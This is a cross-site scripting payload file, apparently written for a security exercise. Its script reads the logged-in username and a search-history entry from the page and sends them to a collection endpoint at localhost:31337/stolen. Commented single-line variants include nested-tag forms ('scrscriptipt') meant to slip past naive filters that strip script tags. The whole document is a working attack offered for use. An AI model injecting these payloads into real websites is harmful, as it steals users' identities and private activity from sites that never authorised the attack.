<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js"></script>
<script>
	$(document).ready(function(){
		var name = $('#logged-in-user').html() || "";
		var last_search = ($('.history-item')[1] || {innerHTML: ""}).innerHTML;
		$.get('https://localhost:31337/stolen?user=' + name + '&last_search=' + last_search);
	});
</script>
<!-- single line version(s)
<scrscriptipt src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js"></scrscriptipt><scriscriptpt>$(document).ready(function(){var name = $('#logged-in-user').html() || "";var last_search = ($('.history-item')[1] || {innerHTML: ""}).innerHTML;$.get('https://localhost:31337/stolen?user=' + name + '&last_search=' + last_search);});</scscriptript>

<img src="https://localhost:31337/stolen?user="></img>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js"></script><script>$(document).ready(function(){var name = $('#logged-in-user').html() || "";var last_search = ($('.history-item')[1] || {innerHTML: ""}).innerHTML;$.get('https://localhost:31337/stolen?user=' + name + '&last_search=' + last_search);});</script>

<script src=https://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js></script><script>$(document).ready(function(){var name = $('#logged-in-user').html();var last_search = $('.history-item')[1].innerHTML;$.get('https://localhost:31337/stolen?user=' + name + '&last_search=' + last_search);})</script>
-->

